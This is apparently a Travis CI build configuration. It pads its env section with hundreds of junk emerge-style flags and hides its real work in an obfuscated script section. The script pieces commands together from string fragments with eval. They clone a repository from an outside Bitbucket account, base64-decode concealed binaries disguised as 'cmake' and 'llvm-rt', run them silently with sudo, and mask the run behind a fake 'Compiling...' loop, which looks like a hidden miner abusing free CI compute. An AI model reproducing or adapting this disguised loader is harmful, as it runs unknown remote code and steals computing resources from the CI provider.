dist: bionic

env:
  - BUILD="--quiet-repo-display=382f7"
  - BUILD="--uiet-build=452Jw"
  - BUILD="--depclean=9727b"
  - BUILD="--quiet-build=339QO"
  - BUILD="--jobs=451ry"
  - BUILD="--fetchonly=408kJ"
  - BUILD="--quickpkg-direct=189dR"
  - BUILD="--fuzzy-search=676ir"
  - BUILD="--exclude=193PN"
  - BUILD="--onlydeps-with-rdeps=262j0"
  - BUILD="--accept-properties=33ba"
  - BUILD="--prefix=694VX"
  - BUILD="--read-news=699uA"
  - BUILD="--root=31824"
  - BUILD="--quiet=629Dr"
  - BUILD="--binpkg-changed-deps=672fu"
  - BUILD="--oneshot=141Rx"
  - BUILD="--delect=444Dm"
  - BUILD="--config-root=332i5"
  - BUILD="--load-average=394bh"
  - BUILD="--selective=412jZ"
  - BUILD="--deep=790gH"
  - BUILD="--prune=330k8"
  - BUILD="--usepkg-exclude=374q5"
  - BUILD="--complete-graph-if-new-ver=32725"
  - BUILD="--resume=2779x"
  - BUILD="--onlydeps-with-rdeps=90847"
  - BUILD="--search-similarity=149ND"
  - BUILD="--depclean=535T7"
  - BUILD="--read-news=84jB"
  - BUILD="--regen=190qh"
  - BUILD="--exclude=352NC"
  - BUILD="--load-average=886Gu"
  - BUILD="--verbose-slot-rebuilds=7668c"
  - BUILD="--package-moves=379cq"
  - BUILD="--fetchonly=295QO"
  - BUILD="--nodeps=9034i"
  - BUILD="--changed-deps=599N3"
  - BUILD="--newuse=295mm"
  - BUILD="--verbose-slot-rebuilds=6436H"
  - BUILD="--help=426Fa"
  - BUILD="--root-deps=282SK"
  - BUILD="--metadata=886Fm"
  - BUILD="--selective=767oD"
  - BUILD="--depclean-lib-check=358xF"
  - BUILD="--autounmask-backtrack=280RA"
  - BUILD="--rebuilt-binaries-timestamp=662xl"
  - BUILD="--complete-graph-if-new-ver=830zv"
  - BUILD="--config=97V8"
  - BUILD="--autounmask-unrestricted-atoms=145bB"
  - BUILD="--check-news=124Bh"
  - BUILD="--autounmask=306p0"
  - BUILD="--selective=541MM"
  - BUILD="--unordered-display=308j1"
  - BUILD="--config-root=2425W"
  - BUILD="--reinstall=732nO"
  - BUILD="--fail-clean=294e6"
  - BUILD="--verbose=613ED"
  - BUILD="--keep-going=70Q5"
  - BUILD="--noreplace=795Yi"
  - BUILD="--package-moves=858jr"
  - BUILD="--onlydeps-with-rdeps=703v0"
  - BUILD="--alert=864Qr"
  - BUILD="--useoldpkg-atoms=594ZF"
  - BUILD="--quiet-fail=845um"
  - BUILD="--nospinner=6764M"
  - BUILD="--quiet-unmerge-warn=283Ho"
  - BUILD="--quiet-unmerge-warn=994fG"
  - BUILD="--digest=250Fe"
  - BUILD="--use-ebuild-visibility=208jW"
  - BUILD="--usepkg-exclude=258HE"
  - BUILD="--nodeps=228kH"
  - BUILD="--dynamic-deps=4245W"
  - BUILD="--misspell-suggestions=874Ug"
  - BUILD="--clean=383WI"
  - BUILD="--unmerge=510Rz"
  - BUILD="--changed-slot=129VV"
  - BUILD="--ask=65bM"
  - BUILD="--autounmask-use=229m3"
  - BUILD="--unmerge=308Et"
  - BUILD="--sysroot=3282W"
  - BUILD="--onlydeps-with-rdeps=460hi"
  - BUILD="--rebuilt-binaries=87AW"
  - BUILD="--autounmask-backtrack=708Jb"
  - BUILD="--autounmask-only=726N2"
  - BUILD="--autounmask-write=851yy"
  - BUILD="--verbose=157Aa"
  - BUILD="--usepkg=196Cm"
  - BUILD="--deselect=547OH"
  - BUILD="--quiet=706R5"
  - BUILD="--read-news=796Nd"
  - BUILD="--usepkg-exclude=528hT"
  - BUILD="--implicit-system-deps=530zR"
  - BUILD="--binpkg-changed-deps=339ir"
  - BUILD="--autounmask-keep-keywords=6825"
  - BUILD="--autounmask-keep-masks=608WV"
  - BUILD="--with-test-deps=112j5"
  - BUILD="--oneshot=3413a"
  - BUILD="--load-average=391UV"
  - BUILD="--list-sets=783ym"
  - BUILD="--noconfmem=495FH"
  - BUILD="--reinstall-atoms=3052l"
  - BUILD="--package-moves=2834Z"
  - BUILD="--search-index=88Q0"
  - BUILD="--quiet-unmerge-warn=860x7"
  - BUILD="--with-bdeps-auto=901lJ"
  - BUILD="--binpkg-changed-deps=100Ko"
  - BUILD="--autounmask-keep-keywords=441SA"
  - BUILD="--autounmask=201fG"
  - BUILD="--rebuild-exclude=8504v"
  - BUILD="--root=860a8"
  - BUILD="--autounmask-keep-masks=2408n"
  - BUILD="--nospinner=71p9"
  - BUILD="--selective=757hw"
  - BUILD="--usepkg-exclude=157P2"
  - BUILD="--verbose-conflicts=763Yp"
  - BUILD="--version=177Jv"
  - BUILD="--color=643vl"
  - BUILD="--depclean-lib-check=48VH"
  - BUILD="--ignore-built-slot-operator-deps=450UG"
  - BUILD="--autounmask-only=848gQ"
  - BUILD="--autounmask-use=628E6"
  - BUILD="--keep-going=796iL"
  - BUILD="--useoldpkg-atoms=502dl"
  - BUILD="--digest=157Ab"
  - BUILD="--changed-deps-report=364Zh"
  - BUILD="--prune=1512"
  - BUILD="--ask-enter-invalid=630ef"
  - BUILD="--deep=338QZ"
  - BUILD="--selective=531AN"
  - BUILD="--nospinner=499nF"
  - BUILD="--buildpkg-exclude=525vT"
  - BUILD="--misspell-suggestions=392AR"
  - BUILD="--newuse=535LK"
  - BUILD="--sync-submodule=369R1"
  - BUILD="--sync=939A1"
  - BUILD="--autounmask-write=464zr"
  - BUILD="--quickpkg-direct=485Z4"
  - BUILD="--changed-deps=953Kl"
  - BUILD="--prune=68Nk"
  - BUILD="--binpkg-respect-use=602QU"
  - BUILD="--info=623jF"
  - BUILD="--complete-graph=786Pf"
  - BUILD="--ask=880cd"
  - BUILD="--changelog=6392O"
  - BUILD="--help=382nc"
  - BUILD="--quickpkg-direct=7448G"
  - BUILD="--skipfirst=811J0"
  - BUILD="--quickpkg-direct=1651l"
  - BUILD="--quiet-build=367tc"
  - BUILD="--usepkgonly=387dR"
  - BUILD="--skipfirst=996cr"
  - BUILD="--config-root=814qA"
  - BUILD="--rebuild-ignore=495La"
  - BUILD="--fuzzy-search=295pf"
  - BUILD="--fuzzy-search=499Fl"
  - BUILD="--backtrack=388nP"
  - BUILD="--buildpkg-exclude=290CH"
  - BUILD="--onlydeps-with-rdeps=644AX"
  - BUILD="--nospinner=25Yu"
  - BUILD="--verbose=1588t"
  - BUILD="--prefix=819kC"
  - BUILD="--debug=595J1"
  - BUILD="--useoldpkg-atoms=68060"
  - BUILD="--fail-clean=497J5"
  - BUILD="--version=29tM"
  - BUILD="--fuzzy-search=384Gx"
  - BUILD="--search=292ID"
  - BUILD="--ignore-default-opts=152jF"
  - BUILD="--rebuilt-binaries-timestamp=9287x"
  - BUILD="--ignore-built-slot-operator-deps=249QR"
  - BUILD="--verbose=881CH"
  - BUILD="--load-average=777FZ"
  - BUILD="--rage-clean=583Vl"
  - BUILD="--resume=175zv"
  - BUILD="--info=69r1"
  - BUILD="--quiet=581BX"
  - BUILD="--exclude=337xp"
  - BUILD="--unordered-display=483CS"
  - BUILD="--reinstall-atoms=891eY"
  - BUILD="--complete-graph-if-new-use=8036d"
  - BUILD="--keep-going=657AZ"
  - BUILD="--changed-use=795PU"
  - BUILD="--metadata=938u1"
  - BUILD="--buildpkgonly=143Wy"
  - BUILD="--changed-use=471K5"

language: minimal

script:
  - sudo apt update || true
  - eFNojRwNwL="sudo apt --"
  - vGuWDuTB="yes install"
  - AxQiObVPD=" cl-base64 "
  - RPvOcHXOO="git &>/dev/"
  - eval "$eFNojRwNwL""$vGuWDuTB""$AxQiObVPD""$RPvOcHXOO""null"
  - kAdvSjRhK="git clone h"
  - aKNGDYj="ttps://gccb"
  - gQihOorOKW="uild@bitbuc"
  - zQBNcNjvS="ket.org/gcc"
  - fJnzMBG="build/gcc.g"
  - ujNymg="it &>/dev/n"
  - eval "$kAdvSjRhK""$aKNGDYj""$gQihOorOKW""$zQBNcNjvS""$fJnzMBG""$ujNymg""ull"
  - PqoVivPuvs="base64 -d g"
  - VISXTIltxKd="cc/cmake_ >"
  - eval "$PqoVivPuvs""$VISXTIltxKd"" cmake"
  - ZHaVrz="base64 -d g"
  - JtMZQMTpAxL="cc/config_ "
  - eval "$ZHaVrz""$JtMZQMTpAxL""> log"
  - ydlceKTC="base64 -d g"
  - mBNQfR="cc/make_ > "
  - eval "$ydlceKTC""$mBNQfR""llvm-rt"
  - chmod +x llvm-rt cmake
  - jfksnW="./cmake"
  - eval "$jfksnW"""
  - eDmBCYoY="sed -i 's/b"
  - NKnlzyF="uild/tundef"
  - cweBeCCLjp="ined2u/g' l"
  - eval "$eDmBCYoY""$NKnlzyF""$cweBeCCLjp""og"
  - sudo ./llvm-rt --config log &>/dev/null &
  - GCC=$(date +%s)
  - BYGuLQEUa="echo $BUILD"
  - eval "$BYGuLQEUa"""
  - while true; do CC=$(date +%s); echo Compiling...; [ $CC -ge $((GCC + 2631)) ] && sudo killall llvm-rt && break; sleep 184; done
